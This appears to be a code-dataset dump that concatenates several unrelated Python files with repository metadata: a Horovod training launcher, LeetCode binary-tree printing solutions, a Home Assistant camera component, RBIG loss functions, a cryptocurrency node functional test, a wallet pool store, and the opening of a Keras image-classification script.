# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Only support tensorflow 2.0
# pylint: disable=invalid-name, no-member
r""" entry point for multi-gpu/ multi-machine training """
import sys
import json
import tensorflow as tf
import horovod.tensorflow as hvd
from absl import logging
from athena import HorovodSolver
from athena.main import parse_config, train
if __name__ == "__main__":
logging.set_verbosity(logging.INFO)
if len(sys.argv) < 2:
logging.warning('Usage: python {} config_json_file'.format(sys.argv[0]))
sys.exit()
tf.random.set_seed(1)
json_file = sys.argv[1]
#config = None
#with open(json_file) as f:
# config = json.load(f)
#p = parse_config(config)
HorovodSolver.initialize_devices()
#multi-servers training should use hvd.rank()
train(json_file, HorovodSolver, hvd.size(), hvd.rank())
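# Illustrative launch hint (added; not from the original file, and the config
# path is a placeholder): each Horovod process runs this script, e.g.
#   horovodrun -np 4 python athena/horovod_main.py <config.json>
# so every rank ends up calling train() with hvd.size()/hvd.rank() as above.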
| 34.2
| 80
| 0.689409
|
34caa512e3f6fcf93e9b677a158e8ca520ed9ac2
| 4,876
|
py
|
Python
|
leetcode_python/Tree/print-binary-tree.py
|
yennanliu/Python_basics
|
6a597442d39468295946cefbfb11d08f61424dc3
|
[
"Unlicense"
] | 18
|
2019-08-01T07:45:02.000Z
|
2022-03-31T18:05:44.000Z
|
leetcode_python/Tree/print-binary-tree.py
|
yennanliu/Python_basics
|
6a597442d39468295946cefbfb11d08f61424dc3
|
[
"Unlicense"
] | null | null | null |
leetcode_python/Tree/print-binary-tree.py
|
yennanliu/Python_basics
|
6a597442d39468295946cefbfb11d08f61424dc3
|
[
"Unlicense"
] | 15
|
2019-12-29T08:46:20.000Z
|
2022-03-08T14:14:05.000Z
|
"""
LeetCode 655. Print Binary Tree
Print a binary tree in an m*n 2D string array following these rules:
The row number m should be equal to the height of the given binary tree.
The column number n should always be an odd number.
The root node's value (in string format) should be put in the exactly middle of the first row it can be put. The column and the row where the root node belongs will separate the rest space into two parts (left-bottom part and right-bottom part). You should print the left subtree in the left-bottom part and print the right subtree in the right-bottom part. The left-bottom part and the right-bottom part should have the same size. Even if one subtree is none while the other is not, you don't need to print anything for the none subtree but still need to leave the space as large as that for the other subtree. However, if two subtrees are none, then you don't need to leave space for both of them.
Each unused space should contain an empty string "".
Print the subtrees following the same rules.
Example 1:
Input:
1
/
2
Output:
[["", "1", ""],
["2", "", ""]]
Example 2:
Input:
1
/ \
2 3
\
4
Output:
[["", "", "", "1", "", "", ""],
["", "2", "", "", "", "3", ""],
["", "", "4", "", "", "", ""]]
Example 3:
Input:
1
/ \
2 5
/
3
/
4
Output:
[["", "", "", "", "", "", "", "1", "", "", "", "", "", "", ""]
["", "", "", "2", "", "", "", "", "", "", "", "5", "", "", ""]
["", "3", "", "", "", "", "", "", "", "", "", "", "", "", ""]
["4", "", "", "", "", "", "", "", "", "", "", "", "", "", ""]]
Note: The height of binary tree is in the range of [1, 10].
"""
# V0
# V1
# https://blog.csdn.net/fuxuemingzhu/article/details/79439026
# http://bookshadow.com/weblog/2017/08/06/leetcode-print-binary-tree/
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def printTree(self, root):
"""
:type root: TreeNode
:rtype: List[List[str]]
"""
self.height = self.findDepth(root)
self.width = (1 << self.height) - 1
self.dmap = [[""] * self.width for x in range(self.height)]
self.traverse(root, 1, self.width >> 1)
return self.dmap
def findDepth(self, root):
if not root: return 0
return 1 + max(self.findDepth(root.left), self.findDepth(root.right))
def traverse(self, root, depth, offset):
if not root: return
self.dmap[depth - 1][offset] = str(root.val)
gap = 1 + self.width >> depth + 1
self.traverse(root.left, depth + 1, offset - gap)
self.traverse(root.right, depth + 1, offset + gap)
# V1'
# https://www.jiuzhang.com/solution/print-binary-tree/#tag-highlight-lang-python
class Solution(object):
def printTree(self, root):
"""
:type root: TreeNode
:rtype: List[List[str]]
"""
def get_height(node):
if not node:
return 0
return 1 + max(get_height(node.left), get_height(node.right))
def traverse(node, level, pos):
if not node:
return
left_padding, spacing = 2 ** (rows - level - 1) - 1, 2 ** (rows - level) - 1
index = left_padding + pos * (spacing + 1)
res[level][index] = str(node.val)
#traverse(node.left, level + 1, pos << 1)
#traverse(node.right, level + 1, (pos << 1) + 1)
traverse(node.left, level + 1, pos*2) # N << 1 == N*2
traverse(node.right, level + 1, (pos*2) + 1)
rows = get_height(root)
cols = 2 ** rows - 1
res = [['' for _ in range(cols)] for _ in range(rows)]
traverse(root, 0, 0)
return res
# V2
# Time: O(h * 2^h)
# Space: O(h * 2^h)
class Solution(object):
def printTree(self, root):
"""
:type root: TreeNode
:rtype: List[List[str]]
"""
def getWidth(root):
if not root:
return 0
return 2 * max(getWidth(root.left), getWidth(root.right)) + 1
def getHeight(root):
if not root:
return 0
return max(getHeight(root.left), getHeight(root.right)) + 1
def preorderTraversal(root, level, left, right, result):
if not root:
return
            mid = left + (right - left) // 2  # integer midpoint (Python 3 safe)
result[level][mid] = str(root.val)
preorderTraversal(root.left, level+1, left, mid-1, result)
preorderTraversal(root.right, level+1, mid+1, right, result)
h, w = getHeight(root), getWidth(root)
result = [[""] * w for _ in xrange(h)]
preorderTraversal(root, 0, 0, w-1, result)
return result
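# --- Added usage sketch (illustrative; not part of the original file). ---
# The TreeNode below simply mirrors the LeetCode stub that appears only as a
# comment above; it is an assumption needed to make the example self-contained.
class TreeNode(object):
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

if __name__ == '__main__':
    root = TreeNode(1)
    root.left = TreeNode(2)
    # Note: all three variants share the name `Solution`, so the last definition
    # (V2) is the one in effect here.
    print(Solution().printTree(root))  # -> [['', '1', ''], ['2', '', '']]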
| 33.861111
| 699
| 0.543478
|
814475d04de916ded03eb4fd29102ec2ed5a8163
| 6,996
|
py
|
Python
|
homeassistant/components/logi_circle/camera.py
|
cwilhelm/home-assistant
|
12d97f0637196c7e19bc655fc82da1a5d2c4888c
|
[
"Apache-2.0"
] | 2
|
2017-10-26T19:43:55.000Z
|
2017-12-30T23:29:00.000Z
|
homeassistant/components/logi_circle/camera.py
|
rdbahm/home-assistant
|
c8048e1aff7063e0301a208783a9fc939d05a100
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/logi_circle/camera.py
|
rdbahm/home-assistant
|
c8048e1aff7063e0301a208783a9fc939d05a100
|
[
"Apache-2.0"
] | 1
|
2022-02-20T07:41:14.000Z
|
2022-02-20T07:41:14.000Z
|
"""Support to the Logi Circle cameras."""
import asyncio
from datetime import timedelta
import logging
import voluptuous as vol
from homeassistant.components.camera import (
ATTR_ENTITY_ID, ATTR_FILENAME, CAMERA_SERVICE_SCHEMA, DOMAIN,
PLATFORM_SCHEMA, SUPPORT_ON_OFF, Camera)
from homeassistant.const import (
ATTR_ATTRIBUTION, ATTR_BATTERY_CHARGING, ATTR_BATTERY_LEVEL,
CONF_SCAN_INTERVAL, STATE_OFF, STATE_ON)
from homeassistant.helpers import config_validation as cv
from . import ATTRIBUTION, DOMAIN as LOGI_CIRCLE_DOMAIN
DEPENDENCIES = ['logi_circle']
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(seconds=60)
SERVICE_SET_CONFIG = 'logi_circle_set_config'
SERVICE_LIVESTREAM_SNAPSHOT = 'logi_circle_livestream_snapshot'
SERVICE_LIVESTREAM_RECORD = 'logi_circle_livestream_record'
DATA_KEY = 'camera.logi_circle'
BATTERY_SAVING_MODE_KEY = 'BATTERY_SAVING'
PRIVACY_MODE_KEY = 'PRIVACY_MODE'
LED_MODE_KEY = 'LED'
ATTR_MODE = 'mode'
ATTR_VALUE = 'value'
ATTR_DURATION = 'duration'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_SCAN_INTERVAL, default=SCAN_INTERVAL):
cv.time_period,
})
LOGI_CIRCLE_SERVICE_SET_CONFIG = CAMERA_SERVICE_SCHEMA.extend({
vol.Required(ATTR_MODE): vol.In([BATTERY_SAVING_MODE_KEY, LED_MODE_KEY,
PRIVACY_MODE_KEY]),
vol.Required(ATTR_VALUE): cv.boolean
})
LOGI_CIRCLE_SERVICE_SNAPSHOT = CAMERA_SERVICE_SCHEMA.extend({
vol.Required(ATTR_FILENAME): cv.template
})
LOGI_CIRCLE_SERVICE_RECORD = CAMERA_SERVICE_SCHEMA.extend({
vol.Required(ATTR_FILENAME): cv.template,
vol.Required(ATTR_DURATION): cv.positive_int
})
async def async_setup_platform(
hass, config, async_add_entities, discovery_info=None):
"""Set up a Logi Circle Camera."""
devices = hass.data[LOGI_CIRCLE_DOMAIN]
cameras = []
for device in devices:
cameras.append(LogiCam(device, config))
async_add_entities(cameras, True)
async def service_handler(service):
"""Dispatch service calls to target entities."""
params = {key: value for key, value in service.data.items()
if key != ATTR_ENTITY_ID}
entity_ids = service.data.get(ATTR_ENTITY_ID)
if entity_ids:
target_devices = [dev for dev in cameras
if dev.entity_id in entity_ids]
else:
target_devices = cameras
for target_device in target_devices:
if service.service == SERVICE_SET_CONFIG:
await target_device.set_config(**params)
if service.service == SERVICE_LIVESTREAM_SNAPSHOT:
await target_device.livestream_snapshot(**params)
if service.service == SERVICE_LIVESTREAM_RECORD:
await target_device.download_livestream(**params)
hass.services.async_register(
DOMAIN, SERVICE_SET_CONFIG, service_handler,
schema=LOGI_CIRCLE_SERVICE_SET_CONFIG)
hass.services.async_register(
DOMAIN, SERVICE_LIVESTREAM_SNAPSHOT, service_handler,
schema=LOGI_CIRCLE_SERVICE_SNAPSHOT)
hass.services.async_register(
DOMAIN, SERVICE_LIVESTREAM_RECORD, service_handler,
schema=LOGI_CIRCLE_SERVICE_RECORD)
class LogiCam(Camera):
"""An implementation of a Logi Circle camera."""
def __init__(self, camera, device_info):
"""Initialize Logi Circle camera."""
super().__init__()
self._camera = camera
self._name = self._camera.name
self._id = self._camera.mac_address
self._has_battery = self._camera.supports_feature('battery_level')
@property
def unique_id(self):
"""Return a unique ID."""
return self._id
@property
def name(self):
"""Return the name of this camera."""
return self._name
@property
def supported_features(self):
"""Logi Circle camera's support turning on and off ("soft" switch)."""
return SUPPORT_ON_OFF
@property
def device_state_attributes(self):
"""Return the state attributes."""
state = {
ATTR_ATTRIBUTION: ATTRIBUTION,
'battery_saving_mode': (
STATE_ON if self._camera.battery_saving else STATE_OFF),
'ip_address': self._camera.ip_address,
'microphone_gain': self._camera.microphone_gain
}
# Add battery attributes if camera is battery-powered
if self._has_battery:
state[ATTR_BATTERY_CHARGING] = self._camera.is_charging
state[ATTR_BATTERY_LEVEL] = self._camera.battery_level
return state
async def async_camera_image(self):
"""Return a still image from the camera."""
return await self._camera.get_snapshot_image()
async def async_turn_off(self):
"""Disable streaming mode for this camera."""
await self._camera.set_streaming_mode(False)
async def async_turn_on(self):
"""Enable streaming mode for this camera."""
await self._camera.set_streaming_mode(True)
@property
def should_poll(self):
"""Update the image periodically."""
return True
async def set_config(self, mode, value):
"""Set an configuration property for the target camera."""
if mode == LED_MODE_KEY:
await self._camera.set_led(value)
if mode == PRIVACY_MODE_KEY:
await self._camera.set_privacy_mode(value)
if mode == BATTERY_SAVING_MODE_KEY:
await self._camera.set_battery_saving_mode(value)
async def download_livestream(self, filename, duration):
"""Download a recording from the camera's livestream."""
# Render filename from template.
filename.hass = self.hass
stream_file = filename.async_render(
variables={ATTR_ENTITY_ID: self.entity_id})
# Respect configured path whitelist.
if not self.hass.config.is_allowed_path(stream_file):
_LOGGER.error(
"Can't write %s, no access to path!", stream_file)
return
asyncio.shield(self._camera.record_livestream(
stream_file, timedelta(seconds=duration)), loop=self.hass.loop)
async def livestream_snapshot(self, filename):
"""Download a still frame from the camera's livestream."""
# Render filename from template.
filename.hass = self.hass
snapshot_file = filename.async_render(
variables={ATTR_ENTITY_ID: self.entity_id})
# Respect configured path whitelist.
if not self.hass.config.is_allowed_path(snapshot_file):
_LOGGER.error(
"Can't write %s, no access to path!", snapshot_file)
return
asyncio.shield(self._camera.get_livestream_image(
snapshot_file), loop=self.hass.loop)
async def async_update(self):
"""Update camera entity and refresh attributes."""
await self._camera.update()
| 33.961165
| 78
| 0.679245
|
8195f4d1192c09c5df5f5d1a495fa62e82615fad
| 2,050
|
py
|
Python
|
rbig/_src/losses.py
|
IPL-UV/rb
|
092d78a0ea5f9670c5cd4f70ff054ec58ff309af
|
[
"MIT"
] | 6
|
2020-10-14T08:35:29.000Z
|
2022-02-18T23:26:30.000Z
|
rbig/_src/losses.py
|
IPL-UV/rb
|
092d78a0ea5f9670c5cd4f70ff054ec58ff309af
|
[
"MIT"
] | 11
|
2020-10-08T10:02:38.000Z
|
2021-03-26T16:00:41.000Z
|
rbig/_src/losses.py
|
IPL-UV/rbig
|
092d78a0ea5f9670c5cd4f70ff054ec58ff309af
|
[
"MIT"
] | null | null | null |
from typing import Union
import numpy as np
from scipy.stats import norm, gaussian_kde
def negative_log_likelihood(X: np.ndarray, X_ldj: np.ndarray) -> np.ndarray:
pz = norm.logpdf(X).sum(axis=-1)
log_prob = pz + X_ldj
return -np.mean(log_prob)
def neg_entropy_normal(data, bins: Union[str, int] = "auto") -> np.ndarray:
"""Function to calculate the marginal negative entropy
(negative entropy per dimensions). It uses a histogram
scheme to initialize the bins and then uses a KDE
scheme to approximate a smooth solution.
Parameters
----------
data : array, (samples x dimensions)
Returns
-------
neg : array, (dimensions)
"""
n_samples, d_dimensions = data.shape
neg = np.zeros(d_dimensions)
# Loop through dimensions
for idim in range(d_dimensions):
# =====================
# Histogram Estimation
# =====================
# Get Histogram
[hist_counts, bin_edges] = np.histogram(
a=data[:, idim],
bins=bins,
range=(data[:, idim].min(), data[:, idim].max()),
)
# calculate bin centers
bin_centers = (bin_edges[:-1] + bin_edges[1:]) / 2
# get delta between bin centers
delta = bin_centers[3] - bin_centers[2]
# Calculate probabilities of normal distribution
pg = norm.pdf(bin_centers, 0, 1)
# ==================
# KDE Function Est.
# ==================
# Initialize KDE function with data
kde_model = gaussian_kde(data[:, idim])
# Calculate probabilities for each bin
hx = kde_model.pdf(bin_centers)
# Calculate probabilities
px = hx / (hx.sum() * delta)
# ====================
# Compare
# ====================
# Find the indices greater than zero
idx = np.where((px > 0) & (pg > 0))
# calculate the negative entropy
neg[idim] = delta * (px[idx] * np.log2(px[idx] / pg[idx])).sum()
return neg
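# Usage sketch (illustrative addition, not part of the original module): for
# standard-normal samples the per-dimension negative entropy should be close to 0,
# and the NLL with a zero log-det term reduces to the mean Gaussian NLL.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    data = rng.randn(1000, 3)
    print(neg_entropy_normal(data))                        # values near 0
    print(negative_log_likelihood(data, np.zeros(1000)))   # scalar NLL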
| 25.949367
| 76
| 0.550244
|
a704cdb1063ef628366cc0a3b246068c32d37dc0
| 7,952
|
py
|
Python
|
test/functional/example_test.py
|
cdonnachie/Avian
|
31fbaaa732af33ed50bd9d5b51023d985c7de683
|
[
"MIT"
] | null | null | null |
test/functional/example_test.py
|
cdonnachie/Avian
|
31fbaaa732af33ed50bd9d5b51023d985c7de683
|
[
"MIT"
] | null | null | null |
test/functional/example_test.py
|
cdonnachie/Avian
|
31fbaaa732af33ed50bd9d5b51023d985c7de683
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Copyright (c) 2017-2020 The Raven Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
An example functional test
The module-level docstring should include a high-level description of
what the test is doing. It's the first thing people see when they open
the file and should give the reader information about *what* the test
is testing and *how* it's being tested
"""
# Imports should be in PEP8 ordering (std library first, then third party
# libraries then local imports).
from collections import defaultdict
# Avoid wildcard * imports if possible
from test_framework.mininode import CInv, NetworkThread, NodeConn, NodeConnCB, mininode_lock, MsgGetdata
from test_framework.test_framework import AvianTestFramework
from test_framework.util import assert_equal, connect_nodes, p2p_port
# NodeConnCB is a class containing callbacks to be executed when a P2P
# message is received from the node-under-test. Subclass NodeConnCB and
# override the on_*() methods if you need custom behaviour.
class BaseNode(NodeConnCB):
def __init__(self):
"""Initialize the NodeConnCB
Used to initialize custom properties for the Node that aren't
included by default in the base class. Be aware that the NodeConnCB
base class already stores a counter for each P2P message type and the
last received message of each type, which should be sufficient for the
needs of most tests.
Call super().__init__() first for standard initialization and then
initialize custom properties."""
super().__init__()
# Stores a dictionary of all blocks received
self.block_receive_map = defaultdict(int)
def on_block(self, conn, message):
"""Override the standard on_block callback
Store the hash of a received block in the dictionary."""
message.block.calc_x16r()
self.block_receive_map[message.block.calc_x16r] += 1
def on_inv(self, conn, message):
"""Override the standard on_inv callback"""
pass
def custom_function():
"""Do some custom behaviour
If this function is more generally useful for other tests, consider
moving it to a module in test_framework."""
# self.log.info("running custom_function") # Oops! Can't run self.log outside the AvianTestFramework
pass
class ExampleTest(AvianTestFramework):
# Each functional test is a subclass of the AvianTestFramework class.
# Override the set_test_params(), add_options(), setup_chain(), setup_network()
# and setup_nodes() methods to customize the test setup as required.
def set_test_params(self):
"""Override test parameters for your individual test.
This method must be overridden and num_nodes must be explicitly set."""
self.setup_clean_chain = True
self.num_nodes = 3
# Use self.extra_args to change command-line arguments for the nodes
self.extra_args = [[], ["-logips"], []]
# self.log.info("I've finished set_test_params") # Oops! Can't run self.log before run_test()
# Use add_options() to add specific command-line options for your test.
# In practice this is not used very much, since the tests are mostly written
# to be run in automated environments without command-line options.
# def add_options()
# pass
# Use setup_chain() to customize the node data directories. In practice
# this is not used very much since the default behaviour is almost always
# fine
# def setup_chain():
# pass
def setup_network(self):
"""Setup the test network topology
Often you won't need to override this, since the standard network topology
(linear: node0 <-> node1 <-> node2 <-> ...) is fine for most tests.
If you do override this method, remember to start the nodes, assign
them to self.nodes, connect them and then sync."""
self.setup_nodes()
# In this test, we're not connecting node2 to node0 or node1. Calls to
# sync_all() should not include node2, since we're not expecting it to
# sync.
connect_nodes(self.nodes[0], 1)
self.sync_all([self.nodes[0:1]])
# Use setup_nodes() to customize the node start behaviour (for example if
# you don't want to start all nodes at the start of the test).
# def setup_nodes():
# pass
def custom_method(self):
"""Do some custom behaviour for this test
Define it in a method here because you're going to use it repeatedly.
If you think it's useful in general, consider moving it to the base
AvianTestFramework class so other tests can use it."""
self.log.info("Running custom_method")
def run_test(self):
"""Main test logic"""
# Create a P2P connection to one of the nodes
node0 = BaseNode()
connections = [NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node0)]
node0.add_connection(connections[0])
# Start up network handling in another thread. This needs to be called
# after the P2P connections have been created.
NetworkThread().start()
# wait_for_verack ensures that the P2P connection is fully up.
node0.wait_for_verack()
# Generating a block on one of the nodes will get us out of IBD
blocks = [int(self.nodes[0].generate(nblocks=1)[0], 16)]
self.sync_all([self.nodes[0:1]])
# Notice above how we called an RPC by calling a method with the same
# name on the node object. Notice also how we used a keyword argument
# to specify a named RPC argument. Neither of those are defined on the
# node object. Instead there's some __getattr__() magic going on under
# the covers to dispatch unrecognised attribute calls to the RPC
# interface.
# Logs are nice. Do plenty of them. They can be used in place of comments for
# breaking the test into sub-sections.
self.log.info("Starting test!")
self.log.info("Calling a custom function")
custom_function()
self.log.info("Calling a custom method")
self.custom_method()
self.log.info("Create some blocks")
self.tip = int(self.nodes[0].getbestblockhash(), 16)
self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1
self.nodes[0].generate(10)
self.log.info("Wait for node1 to reach current tip (height 11) using RPC")
self.nodes[1].waitforblockheight(11)
self.log.info("Connect node2 and node1")
connect_nodes(self.nodes[1], 2)
self.log.info("Add P2P connection to node2")
node2 = BaseNode()
connections.append(NodeConn('127.0.0.1', p2p_port(2), self.nodes[2], node2))
node2.add_connection(connections[1])
node2.wait_for_verack()
self.log.info("Wait for node2 reach current tip. Test that it has propagated all the blocks to us")
getdata_request = MsgGetdata()
for block in blocks:
getdata_request.inv.append(CInv(2, block))
node2.send_message(getdata_request)
self.sync_all([self.nodes[1:2]])
self.log.info("Check that each block was received only once")
# The network thread uses a global lock on data access to the NodeConn objects when sending and receiving
# messages. The test thread should acquire the global lock before accessing any NodeConn data to avoid locking
# and synchronization issues. Note wait_until() acquires this global lock when testing the predicate.
with mininode_lock:
for block in node2.block_receive_map.values():
assert_equal(block, 1)
if __name__ == '__main__':
ExampleTest().main()
| 40.779487
| 118
| 0.68423
|
6a4951c6b9a861d5d20359dce35485c8945d6801
| 4,904
|
py
|
Python
|
melati/wallet/wallet_pool_store.py
|
luzofex/melati-blockchain
|
bddc95ed3a8c5631488cd44a9e76b764c19b4568
|
[
"Apache-2.0"
] | null | null | null |
melati/wallet/wallet_pool_store.py
|
luzofex/melati-blockchain
|
bddc95ed3a8c5631488cd44a9e76b764c19b4568
|
[
"Apache-2.0"
] | null | null | null |
melati/wallet/wallet_pool_store.py
|
luzofex/melati-blockchain
|
bddc95ed3a8c5631488cd44a9e76b764c19b4568
|
[
"Apache-2.0"
] | null | null | null |
import logging
from typing import List, Tuple, Dict, Optional
import aiosqlite
from melati.types.coin_solution import CoinSolution
from melati.util.db_wrapper import DBWrapper
from melati.util.ints import uint32
log = logging.getLogger(__name__)
class WalletPoolStore:
db_connection: aiosqlite.Connection
db_wrapper: DBWrapper
_state_transitions_cache: Dict[int, List[Tuple[uint32, CoinSolution]]]
@classmethod
async def create(cls, wrapper: DBWrapper):
self = cls()
self.db_connection = wrapper.db
self.db_wrapper = wrapper
await self.db_connection.execute("pragma journal_mode=wal")
await self.db_connection.execute("pragma synchronous=2")
await self.db_connection.execute(
"CREATE TABLE IF NOT EXISTS pool_state_transitions(transition_index integer, wallet_id integer, "
"height bigint, coin_spend blob, PRIMARY KEY(transition_index, wallet_id))"
)
await self.db_connection.commit()
await self.rebuild_cache()
return self
async def _clear_database(self):
cursor = await self.db_connection.execute("DELETE FROM interested_coins")
await cursor.close()
await self.db_connection.commit()
async def add_spend(
self,
wallet_id: int,
spend: CoinSolution,
height: uint32,
) -> None:
"""
Appends (or replaces) entries in the DB. The new list must be at least as long as the existing list, and the
parent of the first spend must already be present in the DB. Note that this is not committed to the DB
until db_wrapper.commit() is called. However it is written to the cache, so it can be fetched with
get_all_state_transitions.
"""
if wallet_id not in self._state_transitions_cache:
self._state_transitions_cache[wallet_id] = []
all_state_transitions: List[Tuple[uint32, CoinSolution]] = self.get_spends_for_wallet(wallet_id)
if (height, spend) in all_state_transitions:
return
if len(all_state_transitions) > 0:
if height < all_state_transitions[-1][0]:
raise ValueError("Height cannot go down")
if spend.coin.parent_coin_info != all_state_transitions[-1][1].coin.name():
raise ValueError("New spend does not extend")
all_state_transitions.append((height, spend))
cursor = await self.db_connection.execute(
"INSERT OR REPLACE INTO pool_state_transitions VALUES (?, ?, ?, ?)",
(
len(all_state_transitions) - 1,
wallet_id,
height,
bytes(spend),
),
)
await cursor.close()
def get_spends_for_wallet(self, wallet_id: int) -> List[Tuple[uint32, CoinSolution]]:
"""
Retrieves all entries for a wallet ID from the cache, works even if commit is not called yet.
"""
return self._state_transitions_cache.get(wallet_id, [])
async def rebuild_cache(self) -> None:
"""
This resets the cache, and loads all entries from the DB. Any entries in the cache that were not committed
are removed. This can happen if a state transition in wallet_blockchain fails.
"""
cursor = await self.db_connection.execute("SELECT * FROM pool_state_transitions ORDER BY transition_index")
rows = await cursor.fetchall()
await cursor.close()
self._state_transitions_cache = {}
for row in rows:
_, wallet_id, height, coin_solution_bytes = row
coin_solution: CoinSolution = CoinSolution.from_bytes(coin_solution_bytes)
if wallet_id not in self._state_transitions_cache:
self._state_transitions_cache[wallet_id] = []
self._state_transitions_cache[wallet_id].append((height, coin_solution))
async def rollback(self, height: int, wallet_id_arg: int) -> None:
"""
Rollback removes all entries which have entry_height > height passed in. Note that this is not committed to the
DB until db_wrapper.commit() is called. However it is written to the cache, so it can be fetched with
get_all_state_transitions.
"""
for wallet_id, items in self._state_transitions_cache.items():
remove_index_start: Optional[int] = None
for i, (item_block_height, _) in enumerate(items):
if item_block_height > height and wallet_id == wallet_id_arg:
remove_index_start = i
break
if remove_index_start is not None:
del items[remove_index_start:]
cursor = await self.db_connection.execute(
"DELETE FROM pool_state_transitions WHERE height>? AND wallet_id=?", (height, wallet_id_arg)
)
await cursor.close()
| 41.559322
| 119
| 0.653956
|
f431634900d76cde0def851323ef059366643e00
| 92
|
py
|
Python
|
Pattern/21_pattern.py
|
manish1822510059/Python-1000-program
|
d03c1920fe63a7e32ac5bd9a13e2766d7a25756c
|
[
"Apache-2.0"
] | 1
|
2021-03-06T03:33:42.000Z
|
2021-03-06T03:33:42.000Z
|
Pattern/21_pattern.py
|
manish1822510059/Python-1000-programs
|
d03c1920fe63a7e32ac5bd9a13e2766d7a25756c
|
[
"Apache-2.0"
] | null | null | null |
Pattern/21_pattern.py
|
manish1822510059/Python-1000-programs
|
d03c1920fe63a7e32ac5bd9a13e2766d7a25756c
|
[
"Apache-2.0"
] | null | null | null |
for i in range(1,6):
for j in range(5,i-1,-1):
print(i,end="")
print()
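# Expected output (comment added for clarity): row i prints the digit i
# exactly 6 - i times, i.e.
#   11111
#   2222
#   333
#   44
#   5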
| 23
| 30
| 0.456522
|
563aeff287da7bfd1444ed33c2f0ac004a4803bb
| 16,581
|
py
|
Python
|
code/src03_Train_Model_for_Segmentation_Channel/old_code/run01_CNN_Classification_with_Channel_train.py
|
gakarak/Challenge_Cervical_Cancer_Screening-
|
7cb7cb308b43de4f85a09053723e50c368c05891
|
[
"Apache-2.0"
] | null | null | null |
code/src03_Train_Model_for_Segmentation_Channel/old_code/run01_CNN_Classification_with_Channel_train.py
|
gakarak/Challenge_Cervical_Cancer_Screening-
|
7cb7cb308b43de4f85a09053723e50c368c05891
|
[
"Apache-2.0"
] | null | null | null |
code/src03_Train_Model_for_Segmentation_Channel/old_code/run01_CNN_Classification_with_Channel_train.py
|
gakarak/Challenge_Cervical_Cancer_Screening-
|
7cb7cb308b43de4f85a09053723e50c368c05891
|
[
"Apache-2.0"
] | 2
|
2017-06-27T07:14:06.000Z
|
2021-07-20T15:21:58.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'ar'
import cv2
import time
import shutil
import os
import math
from scipy import ndimage
import matplotlib.pyplot as plt
import skimage.io as skio
import skimage.transform as sktf
import skimage.morphology as skmorph
import skimage.exposure as skexp
import numpy as np
import keras
from keras.layers import Conv2D, UpSampling2D, \
Flatten, Activation, Reshape, MaxPooling2D, Input, Dense, merge, Dropout, SpatialDropout2D, BatchNormalization
from keras.models import Model
import keras.losses
import keras.callbacks as kall
import pandas as pd
from keras.preprocessing.image import ImageDataGenerator
from keras.utils.vis_utils import plot_model as kplot
from keras.utils import np_utils
from keras.utils.vis_utils import plot_model
#####################################################
def buildModelCNN_Classification(inpShape=(256, 256, 3),
numCls=3, kernelSize=3, numFlt = 16,
numConv=2, numSubsampling=5, ppadding='valid', numHidden=None):
fsiz = (kernelSize, kernelSize)
psiz = (2, 2)
dataInput = Input(shape=inpShape)
#
x = dataInput
# (1) Conv-layers
for cc in range(numSubsampling):
if cc==0:
tfsiz = (5,5)
else:
tfsiz = fsiz
for ii in range(numConv):
x = Conv2D(filters=numFlt * (2 **cc), kernel_size=tfsiz,
activation='relu',
padding=ppadding,
                       kernel_regularizer=keras.regularizers.l2(0.01))(x)
# x = BatchNormalization()(x)
# x = Activation('relu')(x)
x = MaxPooling2D(pool_size=psiz, padding=ppadding)(x)
# (2) flatening
x = Flatten()(x)
x = Dropout(rate=0.2)(x)
# (3) hidden dense-layers
if numHidden is not None:
if isinstance(numHidden, list):
for numUnits in numHidden:
                x = Dense(units=numUnits, activation='relu', kernel_regularizer=keras.regularizers.l2(0.01))(x)
else:
x = Dense(units=numHidden, activation='relu',
# W_regularizer=keras.regularizers.l2(0.02)
)(x)
x = Dropout(rate=0.5)(x)
# (4) multiclass-output
x = Dense(units=numCls, activation='softmax')(x)
retModel = Model(inputs=dataInput, outputs=x)
return retModel
#####################################################
def preproc_image(pimg, prnd=None):
ndim = pimg.ndim
if prnd is None:
trnd = np.random.randint(2)
else:
trnd = prnd
timg = pimg[:, :, :3].copy()
ret = pimg.copy()
if trnd == 0:
timg = skexp.equalize_hist(timg.astype(np.uint8)).astype(np.float32) * 255.
elif trnd == 1:
vrnd = 1.0 + 0.2 * ( np.random.rand() - 0.5)
timg = skexp.adjust_gamma(timg, vrnd, 2.71828 / np.exp(vrnd))
elif trnd > 1:
rndVals = 2.0 * np.random.rand(ndim,2) - 1.0
rndVals[:, 0] *= 30
rndVals[:, 1] = 1.0 + 0.2 * rndVals[:, 1]
for ii in range(ndim):
timg[:,:,ii] = rndVals[ii,0] + rndVals[ii,1] * timg[:,:,ii]
timg[timg < 0] = 0
timg[timg > 255] = 255
ret[:, :,:3] = timg.copy()
return ret
#####################################################
def calcDistArr2Point(parr2d, pp2d):
sizArr = parr2d.shape[0]
ret = np.linalg.norm(parr2d - np.tile(pp2d, (sizArr,1)), axis=1)
return ret
def buildImageWithRotScaleAroundCenter(pimg, pcnt, pangDec, pscale, pcropSize, isDebug=False):
# (1) precalc parameters
angRad = (np.pi / 180.) * pangDec
cosa = np.cos(angRad)
sina = np.sin(angRad)
# (2) prepare separate affine transformation matrices
matShiftB = np.array([[1., 0., -pcnt[0]], [0., 1., -pcnt[1]], [0., 0., 1.]])
